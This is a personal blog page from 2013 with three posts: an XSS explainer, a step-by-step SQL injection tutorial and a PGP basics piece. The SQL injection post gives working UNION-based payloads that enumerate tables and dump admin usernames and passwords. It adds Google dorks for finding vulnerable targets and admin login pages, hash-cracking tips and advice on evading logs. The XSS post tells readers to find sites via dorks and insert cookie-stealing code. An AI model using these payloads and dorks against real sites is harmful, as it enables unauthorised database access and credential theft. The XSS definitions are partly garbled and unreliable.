Sunday, 27 January 2013

XSS Attack

When I saw the comment posted by an Anonymous in my previous article SQL Injection, I taught yes I should talk about another injection attack called Cross Site Scripting Attack or the XSS or the HTML Injection attack...! But I once again say that I'm not a hacker and I'm not responsible If some one miss uses the contents of my Blog.
 Before coming to the topic my words to the one  who loves hacking, "Please note no hacker says that he is a hacker and givers out the clues related to his works...!" yes it is concerned with that Anonymous, who described himself as a Grey Hat hacker.


Cross-site scripting (XSS) or the Markup injection is a type of computer security vulnerability typically found in Web applications. Due to breaches of browser security, XSS enables attackers to inject client-side script (including ActiveX, Java, VBScript, Flash, or even HTML scripts) into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007


"Cross-site scripting (XSS) Markup injection is an attack where the attacker inserts malicious client-side code into the targeted webpages."


Types of XSS attacks:

i. Non-persistent
The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.
Here is the example for  XSS Vulnerability.

ii. Persistent
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
As Persistent attack is very dangerous and against the cyber law of my Nation I can't give any examples for that..., SORRY





                   What a hacker can do...?


i. Thanks to Cross-Site Scripting vulnerabilities, a hacker can use this method to recover data exchanged between the user and the website concerned. The code injected in the web page can be used to display a form to fool the user and get him to enter authentication information, for example.

ii. Moreover, the injected script may redirect the user to a web page controlled by the hacker and possibly featuring the same graphic interface as the compromised site in order to fool the user.

iii. In such a context, the trust-based relationship that existed between the user and the website is fully compromised.
 

              How to avoid...?

Users can protect themselves against XSS attacks by configuring their browsers to prevent the execution of script languages. In reality, this solution is often much too restrictive for the user since many sites refuse to run correctly when there is no possibility of dynamic code execution.

note: Internet Explorer automatically blocks the execution of script languages.

The only viable solution for preventing Cross-Site Scripting attacks is to design non-vulnerable websites. To do so, the designer of a website should:

    * Verify the format of data entered by users;
    * Encode displayed user data by replacing special characters with their HTML equivalents.

The term "sanitation" refers to all actions that help make data entered by a user secure.

Here is a small example of XSS Vulnerability as suggested by my friend plz do check it out....
and later don't forget to remove the script after ? symbol in the addressbar and check out the real webpage...! 

Quick Get Started to Exploit XSS Vulnerability for fun, as hacking is  just a game to me and I'm not a hacker...!

Step 1: Finding Vulnerable Website:
  You can use Google Dork to find out the target or can use trial and error method
   simply type inurl:.php?id=  in google    

Step 2 : Testing  Vulnerability in the Website:

Type i.

 Once we found the input field, let us try to put some string inside the field, for instance let me    input a html tag like,
 <img src="http://blog.twinbytes.ca/wp-content/uploads/2012/11/wordpress-hacked.jpg" />.
 If it will display the image on the web page then you can F**K it...!

 Type ii.           
  The best way is you can directly insert the Client side scripting codes in the address bar directly...!

Step 3 : Enjoy the visit:
So once you have found the vulnerability you can insert the Cookie steel codes, to steel the sessions details of a victim visiting the site or you can permanently redirect the clients to other websites or you can also make the website unavailable by inserting infinite loop alert on the page load...!

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."

Never forget a true hacker always follow the rule of  Anonymity on Web...!

Add to Google Technology Blogs
Blog search
indiae.in
we are in
Make money Paisa Live
Like us on Facebook

Thursday, 17 January 2013

SQL Injection


If you are crazy about hacking here I'm going to tell you about a simplest hacking procedure called The SQL Injection...
  SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...!

"SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".

So what you need to do that...?

You need to find vulnerable sites manually by using some Google Droks


Checking for vulnerability:



Step1:
 In order to check if a site is vulnerable to SQL injection, just put a ' in the end of the url like this:

http://www.examplesite.com/index.php?id=5'
If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.

You may get Like this on the webpage:

Warning: mssql_execute(): message: Error converting data type varchar to int. (severity 16) in /var/www/html/includes/dbconnect.class.php on line 59

In order to successfully extract information from the database we need to do a few things, so it might be a good idea to open a text document so you can write stuff down. 



Step2:
 First we need to find out how many columns there is in the database. To do so we will use this query (a trial and error method):

http://www.examplesite.com/index.php?id=5 order by 1--

And we will keep increasing the number until we get an error.

http://www.examplesite.com/index.php?id=5 order by 5--
http://www.examplesite.com/index.php?id=5 order by 10--
Lets say there is 10 columns in the database.



Step3:
 Now we need to find out which columns that are vulnerable to SQL injection. To do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--

Notice that I have put a single - in front of the id number (id=-5)
Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.



Step4:
 Now we wanna find the version of the database. To do so we will use this query (in either 1 of the vulnerable tables but i chose 3 for this example)

http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
And if that doesn't work then try this 1:
http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--





Step5:
 Now we want to get the name of the database for later usage, to do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--

Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )



Step6:
If the version is 5 or above then we will use this query to show all the tables:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


You don't have to group concatenate the output here. These queries would work as well

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Now you have the table names! 


Now you need to look at those tables and see if you can spot some tables we know has good information in it, tables such as:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Of course the admin might not have given the table such an obvious name so you might have to look around about it.




Step7:
 Once you have found the table you think has the information you want, we will use this query (In this example i use admin):

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--

If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.

To do this:
Copy the name of the table you are trying to access, visit the site
Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this.

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--

Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.



Step8:
 Now, once again you will have to spot the columns we wanna see the contents of (although it is hopefully easier this time)
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--

this is where we needed the database name. Btw the 0x3a means colon ( : )

Now you have the admin login!

If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked


And now we have to find the admin login, to do so, once again you can use
Google Droks to search for it manually

example :

inurl:adminlogin.php
inurl:admin.aspx
etc etc. 


and now check out for the Administrators Login and enjoy the Hack Trip...!

In the end:
   Feels lazy in typing each and every sql query in the address bar...?
    Don't worry even you 2 can enjoy this hack trip, just use Havij  or SQL Poizon they are the GUI   Hack tools for you lazy guy...!

His not the end here I'm providing you a link that contains list of rich Google Droks and they are personally tested by me hi you can use is for XSS and for SQL Injection....
some popular Droks:-

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
For some more... download Google_Droks.rtf

 Hi but be aware of log files of the websites as they always track your actions and I'm not responsible in case you are in trouble..., as this is just a game and always maintain Anonymity on Web

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."


Add to Google Technology Blogs
Blog search
indiae.in
we are in
Make money Paisa Live
Like us on Facebook

Monday, 7 January 2013

Cryptography The Basics




In this text I'll talk about encryption, what is it, Pretty Good Privacy (PGP), ways that someone can read your encrypted files etc. Every hacker or paranoid should use encryption and keep the other from reading their files.The encryption is very important thing and I'll talk about how can
someone break and decrypt your files here...!


So now let me tell about Encryption and how it works now.

The Encryption is very old.Even Julius Caesar used it when he was sending messages because he didn't trust to his messengers.You see encryption is everywhere,when you watch some spy film you see there's always a computer with encrypted files or some film about hackers when the feds busted the hacker and they see all of the hacker's files are encrypted. When you have simple .txt file that you can read this is called "plain text". But when you use encryption and encrypt the file it will become unreadable by the time you don't enter the password.This text is called cipher text. The process of converting a cipher text into plain text is called decryption...
Here's a little summary:

Plain text ==>Encryption==>Ciphertext==>Descryption==>Plaintext



About the Cryptography and PGP

Cryptography is science that use the mathematics to encrypt and decrypt data.This science let you keep your files and documents safe even on insecure networks like the Internet. The cryptography can be weak and strong.The best is of course the strong one. Even when you use all the computers in the world and they're doing billion operations in second you'll just need BILLIONS of years to encrypt strong encryption.

PGP (Pretty Good Privacy) is maybe the best encryption program to encrypt your files and documents, that work in this way:

When you encrypt one file with PGP,PGP first compress the file.This saves you disk space and modem transmission. Then it creates a session key. This session key works with a very secure and fast confidential encryption algorithm to encrypt the file.Then the session key is encrypted with the
recipient's public key. PGP ask you for pass phrase not for password.This is more secure against the dictionary attacks when someone tries to use all the words in a dictionary to get your password.When you use pass phrase you can enter a whole phrase with upper and lowercase letters with numeric and
punctuation characters.



So let's look at the Ways of breaking the encryption

PGP has been written for people that want their files encrypted for people that want privacy.
When you send an e-mail it can be read from other people if you use PGP only the person for who
is the message will be able to read it. Now you know many things about PGP and the encryption but you may like to know can someone break it and read your private texts and files.In fact if you use all the computers in the world to decrypt a simple PGP message they'll need long times the. You see this is the BEST the encryption is so strong noone can break it. The people that program it has done their work now everything depends on you.


a-Bad pass phrases

The algorithm is unbreakable but they're other ways to decrypt the text and read it. One of the biggest mistakes when someone writes his/her pass phrase is that the pass phrase is something like : "Jessi" "I love you" and such lame phrases.Other one are the name of some friend or something like that. This is not good because this is pass phrase not password make it longer put numbers and other characters in it.The longer your pass phrase is the harder it will be guessed but put whole sentences even one that doesn't make sense just think in this way:
Someone is brute-forcing thousands of pass phrases from a dictionary therefore my pass phrase
should be someone that is not there in the dictionary something very stupid like:

"Je$$!_!_l0v3_U,w!11_U_m@rRy_m3"

Did you get that...?
 my sentence was  "Jessi I love u, will u marry me"

This is easy to remember because it's funny and there are only a few numbers and you may use
upper and lowercase characters in it. I hope you know will put some very good pass phrase and be sure noon will know it.
Another mistake is that you may write the pass phase on a paper and if someone find it you'll loose
it and he/she will be able to read your encrypted files, so be aware of that...!




 
b-Not deleted files

Another big security problem is how most of the operating systems delete files.So when you encrypt
the file you delete the plain text and of course leave the encrypted one. But the system doesn't actually delete the file. It just mark those blocks of the disk deleted and free. Someone may run a disk recovery program and still see all the files but in plain text. Even when you're writing your text file with a word editor it can create some temporary copies of it.When you close it these files are deleted but as I told you they're still somewhere on your computer. PGP has tool called PGP Secure Wipe that complete removes all deleted files from your computer by overwriting them. In this way you'll only have the encrypted files on your computer.


c-Viruses and Trojans

Another dangerous security problem are the viruses and the Trojans. So when you infect with a
trojan the attacker may run a key logger on your system.
*Note
A key logger is a program that captures all keystrokes pressed by you then saves them on your
hard drive or send them to the attacker, so after the attacker run it he/she will be able to see everything you have written on your computer and of course with your PGP pass phrase.
There are also a viruses designed to do this.Simpy record your pass phrase and send it back to the
attacker.


d-Fake Version of PGP

Another security problem is the PGP source that is available so someone can make a fake copy of it that is recording your pass phase and sending it back to the attacker. The program will look real and it will work but it may also have functions you even don't know about. A way of defending of these security problems is to use a trojan and a virus scanner.You should also be sure your computer is clean from viruses and trojans when you install PGP and also be sure you get PGP from Network Associates Inc. not from some other pages.

So now I hope you understand that PGP can't be braked but if you use it wisely and be sure
your pass phrase is good one,you're not infected with viruses or trojans and you're using the
real version of PGP you'll be secure.
Like us on Facebook Add to Google
Technology Blogs
Blog search Make money Paisa Live
indiae.in
we are in

Featured post

Common Errors in English

Although English is a foreign language yet its important to learn in our country, If you needs to survive just out of your state now En...